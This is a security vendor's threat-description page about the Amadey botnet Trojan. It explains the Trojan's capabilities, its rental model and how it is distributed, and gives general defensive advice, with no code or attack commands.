Amadey
Amadey is a botnet Trojan that grants attackers access to your PC's files and system settings for delivering other threats. Its presence can facilitate the dropping of banking Trojans and similar spyware, while also providing data-exfiltrating features, in and of itself. Users should protect their PCs by having anti-malware products active for removing Amadey automatically since its symptoms are limited.
When Threat Actors Sell Their Goods to the Wrong Customer
Information on the Amadey botnet and its threat-loading mechanisms have been available for months, but the means of acquisition of this intelligence has been unorthodox. Members of the cyber-security community paid the upfront fee for 'hiring' Amadey's zombie network services, and in the process, gained in-depth information on the samples' code. As a result, Amadey is one of the more thoroughly-explored of Trojan downloaders in the Black Market.
Third-party threat actors can rent the Russian Amadey Trojan's capabilities for six hundred USD and run campaigns for it via an easy-to-use admin panel. While its technical proficiency of code is of debatable merit, Amadey does include significant obfuscation functions for hiding itself from detection. It also will detect the presence of major AV vendors' software and alert the C&C, if necessary.
Amadey bypasses the UAC with a built-in exploit and can conduct attacks such as downloading other files, loading DLLs or executables, and collecting system information. Malware experts note its primary usage as being for delivering other Trojans onto the PC with more-specific attack features, such as the network traffic-obfuscator, SystemBC, or the Danabot banking Trojan. Other payloads are both possible and likely since the Trojan operates on a mercenary basis.
Making Sure that Russian Hirelings Sell Themselves Short
Despite its purposing itself as a downloader, its victims should treat Amadey as being equivalent to a backdoor Trojan, in terms of security risks. Through it, a threat actor may copy and collect files, abuse harvested system details for other attacks, and circumvent various Windows security protocols. Although its code, minus the encryption and obfuscation, isn't high-quality or advanced, the Trojan operates as an effective means of escalating initial security breaches into more-specialized and invasive incidents.
Some cases of Amadey infections use e-mail and corrupted Office documents for compromising victims, although any for-hire threat has the potential for numerous distribution strategies. Scanning e-mail attachments, disabling browser scripts and document macros, updating software, and using strong passwords are appropriate, preemptive defenses. Like most botnets, Amadey runs without leaving readily-visual symptoms, and malware experts recommend against attempting any manual detection or removal, for most users.
For disinfection, always update your anti-malware solutions before deleting Amadey, which may include recently-patched defenses against previous threat-detecting methodologies.
For the price it commands, Amadey doesn't have a very high reputation on the Dark Web. Its spotty reception is, possibly, not that relevant, however – since there's a steady supply of sufficiently-desperate criminals using one-star Trojans for attacks dealing four stars worth of damage.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.